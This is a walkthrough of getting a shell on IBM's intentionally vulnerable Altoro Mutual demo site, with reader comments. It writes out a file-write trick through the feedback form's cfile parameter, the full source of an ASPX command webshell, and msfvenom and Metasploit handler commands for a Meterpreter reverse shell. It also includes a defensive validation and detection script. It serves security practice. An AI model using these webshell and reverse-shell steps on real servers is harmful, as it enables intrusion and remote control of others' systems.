Altoro Mutual ~$ Known as the “Hack me” site made by IBM.

This site has all possible vulnerabilities, such as: “XSS, SQL Injection, RFI/LFI” and more.

I’m going to skip “XSS” and “SQL Injection” in this walkthrough and proceed to “RFI/LFI” to get a shell.


~$ Web Shell

If we scan the Altoro Mutual website with Burp Spider, we will detect that there is a “comment.aspx” page that POSTs to a “comments.txt” file.

Now let's navigate to the “comments.txt” file: “http://demo.testfire.net/comments.txt”

Altoro Mutual Walkthrough - Get Shell

The same data that Burp Spider posted appears in the “comments.txt” file.

Let's navigate to “feedback.aspx” and check whether we can change the posted data with Burp!


I have changed “cfile=comments.txt” to “cfile=alexander.aspx”. Let's check whether the file has been created: navigate to “alexander.aspx”.


Good news! Now we know that we can create an .aspx file. So why not post some .NET code in there? 🙂
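From the defender's side, the root cause here is that the client chooses the file name the feedback handler writes to. The following is an added example (not code from the original post or from the Altoro Mutual application) showing the server-side check that stops the cfile rename, plus a detector over constructed request records; it assumes the handler only ever appends to comments.txt and that a proxy or WAF log records the form parameters (plain IIS W3C logs do not keep POST bodies).

```python
import os
import re
from urllib.parse import parse_qs

# Assumption: the feedback handler may only ever append to this one file.
ALLOWED_TARGET = "comments.txt"
# Web-executable or server-configuration extensions that must never be creatable
# through a comment form (IIS would run an .aspx written under the web root).
DANGEROUS_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".jsp", ".php"}

def reject_reason(cfile):
    """Return None if the client-supplied cfile may be written to, else why not.
    The page's trick (cfile=comments.txt -> cfile=alexander.aspx) fails at the
    second check; traversal fails at the first; any other name at the third."""
    name = cfile.strip()
    if not name or re.search(r"[\\/\x00]", name) or ".." in name:
        return "path characters"
    if os.path.splitext(name)[1].lower() in DANGEROUS_EXTS:
        return "executable extension"
    if name != ALLOWED_TARGET:
        return "unexpected target"
    return None  # the only accepted value is exactly ALLOWED_TARGET

def suspicious_feedback_posts(records):
    """Flag POSTs to feedback.aspx whose cfile would be rejected by reject_reason.
    Each record is 'METHOD URI FORMDATA' (assumption: a proxy/WAF log format that
    keeps the form body). Returns a list of (cfile value, reason) tuples."""
    hits = []
    for record in records:
        parts = record.split()
        if len(parts) < 3 or parts[0] != "POST" or not parts[1].endswith("/feedback.aspx"):
            continue
        for value in parse_qs(parts[2]).get("cfile", []):
            reason = reject_reason(value)
            if reason is not None:
                hits.append((value, reason))
    return hits

# Constructed sample records for this example (not real traffic).
SAMPLE_RECORDS = [
    "POST /feedback.aspx cfile=comments.txt&name=bob&comments=nice+site",
    "POST /feedback.aspx cfile=alexander.aspx&name=x&comments=%3C%25%40+Page+Language",
    "GET /alexander.aspx -",
    "POST /feedback.aspx cfile=..%2Fweb.config&name=y&comments=z",
]

if __name__ == "__main__":
    for value, reason in suspicious_feedback_posts(SAMPLE_RECORDS):
        print(f"ALERT cfile={value!r}: {reason}")
```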

Let's use the ASPX webshell that already exists on your Kali machine!

The ASPX webshell is located at /usr/share/webshells/aspx/cmdasp.aspx
We need to remove the “HTML, HEAD, title” tags from the code! The server probably detects them…

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>


It's better to paste the code into the form fields, because the code will then be encoded properly.


Navigate to “alexander.aspx”.
We will see an input field; this is our terminal!


Great, we got a WebShell! 🙂


~$ Meterpreter Shell

We already know how to create “aspx” files with our code. So let's create one with a reverse shell!

Open your terminal and create the aspx code with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f aspx > aspxshell.aspx

Copy the code and post it as a new “feedback” 🙂


Now open “msfconsole”, use exploit/multi/handler and set the windows/meterpreter/reverse_tcp payload.

root@kali:~ $ msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT <your port>
LPORT => <your port>
msf exploit(multi/handler) > set LHOST <your ip>
LHOST => <your ip>
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on <your ip>:<your port>

Ready to get a Meterpreter shell? Just navigate to the file we created: “aspxshell.aspx”


Great, we got a Meterpreter shell! 🙂


Comments on Altoro Mutual – Get SHELL!

  • neha

    I have tried to change the POST data with Burp from “cfile=comments.txt” to “cfile=myFile.jsp”, and then navigated to the page, but it returns an error – Page could not be found. Any other way to get the webshell?

    • UtopiaBe

      Hello, I don’t think that the server of “Altoro Mutual” supports JSP files; as you can see it’s an ASPX (.NET) web server, so probably the server doesn’t accept the .JSP extension and deletes it.
      Try to do as I did with the ASPX file extension.

      • RoodyChan

        Hi, the server has been updated to Tomcat 7 now, and it only supports JSP files; the vulnerable aspx files have been deleted.
        And now can you still get its webshell?
        Expecting your reply.
